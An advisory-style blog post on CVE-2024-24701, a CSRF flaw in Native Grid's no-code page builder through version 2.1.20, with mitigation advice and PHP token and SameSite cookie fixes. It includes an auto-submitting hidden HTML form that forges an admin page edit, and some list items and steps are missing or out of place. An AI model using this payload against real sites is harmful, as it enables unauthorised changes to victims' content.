CVE CyberSecurity Database News

CVE-2024-24701 - How a CSRF Bug Threatens Websites Using Native Grid’s No-Code Page Builder (v2.1.20 and Below)

Poster -

On February 2024, a pretty dangerous vulnerability popped up in Native Grid LLC’s “A no-code page builder for beautiful performance-based content”. Tracked as CVE-2024-24701, this bug is a Cross-Site Request Forgery (CSRF), and it affects software versions up to 2.1.20. If you use this page builder, your site could be open to attackers messing with your content and settings — and you might have no clue until it’s too late.

This post will break it all down: what CSRF is, how this exploit works, sample malicious code, and step-by-step details so you can understand (and fix!) the threat fast.

What is CSRF?

CSRF (Cross-Site Request Forgery) tricks trusted users into running unwanted actions on a web app where they’re logged in. The attacker gets the victim’s browser to send a request to your app, but it comes from your own site, using your user permissions. This can lead to:

More, depending on what the app lets logged-in users do

If the app doesn’t use CSRF tokens (a basic security step), it’s wide open for trouble.

Why is Native Grid’s Page Builder Vulnerable?

Native Grid’s no-code page builder (versions up to 2.1.20) failed to require CSRF protections on key admin actions. If you’re logged in as an admin or page designer, attackers can send you a trick link or embed a form on another site. If you click it, your browser sends commands — using your privileges — to your own page builder.

The bug was confirmed by the awesome folks at huntr.dev and later listed in the NVD.

How the Exploit Works

Let’s look at a classic CSRF attack. We’ll use a form submission that tricks an admin into editing a page title. Of course, it could be much worse — attackers might delete pages or change settings.

Step-by-Step

1. Attacker finds a sensitive admin action endpoint like /admin/editor/save that changes page content.

Victim logs in to Native Grid’s admin.

3. Attacker sends the victim a malicious link or embeds a hidden form in an email, blog, or comment.

Here’s a simple HTML snippet an attacker could use

<!-- Place this on any web page the victim might visit -->
<html>
  <body>
    <form action="https://yourwebsite.com/admin/editor/save"; method="POST" id="csrfForm">
      <input type="hidden" name="page_id" value="123" />
      <input type="hidden" name="title" value="Hacked by CSRF!" />
      <input type="hidden" name="content" value="You have been hacked!" />
    </form>
    <script>
      // Auto-submit when the page loads
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>

Replace the action URL, field names, and values as needed for your app.

Potentially elevate privileges or disrupt customers

This is especially risky if your site lets users publish content without review, or if your admins work across multiple sites at once.

How to Fix and Protect Against CSRF

Native Grid should urgently patch versions up to and including 2.1.20. Here’s what *should* be done (and what you can do in the meantime):

1. Implement CSRF Tokens

All forms that modify data (create, update, delete) must have a unique CSRF token, checked on the server for EVERY request.

Example fix in PHP

// When serving the form:
session_start();
$token = bin2hex(random_bytes(32));
$_SESSION['csrf_token'] = $token;
?>
<form method="POST" action="/admin/editor/save">
  <input type="hidden" name="csrf_token" value="<?= $token ?>" />
  <!-- other fields -->
</form>
<?php
// Then, on the server when processing the POST:
if ($_POST['csrf_token'] !== $_SESSION['csrf_token']) {
  die('Invalid CSRF token!');
}

*See OWASP CSRF Prevention Cheat Sheet for details.*

2. Use SameSite Cookies

Wait for an update, but meanwhile, you can sometimes reduce risk by setting cookies as SameSite=Strict or Lax.

Example

setcookie('session_id', $session_id, [
    'samesite' => 'Strict',
]);

3. Update Immediately

Check for patched versions from Native Grid and *apply updates ASAP*.

If no patch is available, limit admin access and reduce exposure as much as possible.

4. Monitor Admin Activity

Review admin logs for suspicious edits. Set up alerts for unexpected changes.

References

- huntr: Original CVE-2024-24701 Report and Discussion
- National Vulnerability Database CVE-2024-24701 Entry
- Native Grid Product Page
- OWASP CSRF Prevention Cheat Sheet

Conclusion

CVE-2024-24701 is a real and serious CSRF flaw in Native Grid’s no-code page builder, through version 2.1.20. Attackers can change your content without you knowing, just by tricking you or your admins into clicking their page.

Mitigate now: update your software, restrict admin access, and make sure your forms use CSRF tokens everywhere.

Stay safe — don’t let a simple trick undo months (or years) of your work!

*Written exclusively for users looking for practical, clear info on the cutting-edge CVE-2024-24701 Native Grid bug.*

Timeline

Published on: 02/29/2024 01:44:12 UTC
Last modified on: 02/29/2024 13:49:29 UTC